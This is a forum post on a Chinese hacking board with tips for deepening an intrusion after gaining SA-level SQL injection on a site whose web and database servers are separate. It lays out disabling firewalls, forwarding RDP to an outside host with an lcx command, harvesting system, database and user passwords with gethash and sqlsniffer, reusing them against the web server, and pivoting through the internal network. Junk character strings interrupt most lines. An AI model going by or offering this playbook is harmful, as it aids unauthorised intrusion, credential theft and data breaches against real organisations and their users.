找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2024|回复: 0
打印 上一主题 下一主题

SA权限网站和数据库分离的一些思路

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 21:46:01 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。, R* D; F+ S# V  B, m6 z
6 W6 R1 z! m4 j3 t; b; u8 y' M( T3 z

' b/ q# f; M$ h% _, R% ]* Z0 ?0 t+ k5 D0 G8 x; o
SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)
* i; ]$ l& N( `% e! J9 N& I5 X% t) W7 I5 N0 w  _
. F7 w4 H" Q% i8 H3 J/ X, }
一、DB机有公网IP.
/ B0 I9 t9 Q: k4 L. m4 }. ^: G, @" K3 I9 y+ Y) D: X. g
1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.
# h/ y7 e6 z, J' j$ Q3 m. Y+ j5 H7 ~
) P1 y7 S: \9 ?) N6 T' d
2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.' f; ^# p1 V' n

* F% M) a  V! E. X, Q- T$ d: H+ h' }' r0 L' ?6 i0 N
3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
5 F5 \: S# a# C: b0 a9 @9 ]: ]* M/ z9 W) L$ ^
8 c  g  \& c' E( K7 L
4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.
9 }! Z* x3 g6 y, {; q  d% k
0 w! k, Q: R) ?, ?; ~& e, G2 Y6 c: a
& g+ L6 u# e1 c1 W% P3 v
二、DB机只有内网IP1 C% c/ G* {- q9 k
& O" Z" f9 G. O) Q) m' f
1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.  _. q5 F; ~1 l! J( c

5 }# }* F) S( d7 _% d) n9 T2 y/ ?9 y; S4 R, ^
2:停掉防火墙和IP策略再从内往外扫描.
/ m* A6 }0 ?/ I9 j$ \& j5 Z0 ?& V% [! E

, \% `" E( M; d. l5 J3 W3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.
: L, W8 `5 K  `! \- ?. V# c7 R9 f- x1 E8 k8 N, F3 \6 K

! f: c, n, O8 b' ^# r1 h* O4:学会密码规律分析往往会有惊喜.! t, @7 ]1 b) W; d2 C
2 n' [  R2 Y  X" K
, h/ Q- z  X7 a# f+ F+ S# \
5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等
$ A" o  `4 j3 i! c, G
3 H/ j- l0 _5 G2 u  j! |* _+ C+ u6 |; q+ U6 C
有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的​
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表